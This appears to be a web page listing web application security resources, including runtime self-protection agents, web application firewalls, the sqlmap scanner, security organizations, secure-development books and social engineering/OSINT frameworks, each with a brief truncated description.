Runtime Application Self-Protection

Sqreen – Sqreen is a Runtime Application Self-Protection (RASP) solution for software teams. An in-app agent instruments and monitors the app. Suspicious user activities are reported and attacks are blocked at runtime without code modification or traffic redirection. OpenRASP – An open source RASP solution actively maintained by Baidu Inc. With context-aware detection algorithm the […]

Scanning / Pentesting

sqlmap – sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching […]

Web Application Firewall

ModSecurity – ModSecurity is a toolkit for real-time web application monitoring, logging, and access control. NAXSI – NAXSI is an open-source, high performance, low rules maintenance WAF for NGINX, NAXSI means Nginx Anti Xss & Sql Injection. sql_firewall SQL Firewall Extension for PostgreSQL ironbee – IronBee is an open source project to build a universal […]

Organization

OWASP – The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Portswigger – PortSwigger offers tools for web application security, testing & scanning. Choose from a wide range of security tools & identify the very latest vulnerabilities. Let’s Encrypt – Let’s Encrypt is a […]

Development

API Security in Action – Book covering API security including secure development, token-based authentication, JSON Web Tokens, OAuth 2, and Macaroons. (early access, published continuously, final release summer 2020) Secure by Design – Book that identifies design patterns and coding styles that make lots of security vulnerabilities less likely. (early access, published continuously, final release […]

Social Engineering / OSINT

Gophish – An Open-Source Phishing Framework. Maltego – Maltego is an open source intelligence and graphical link analysis tool for gathering and connecting information for investigative tasks. Maltego is a Java application that runs on Windows, Mac and Linux. Social Engineering Toolkit (SET) – Social Engineering Toolkit (or SET) is an open-source, Python-driven toolkit aimed at […]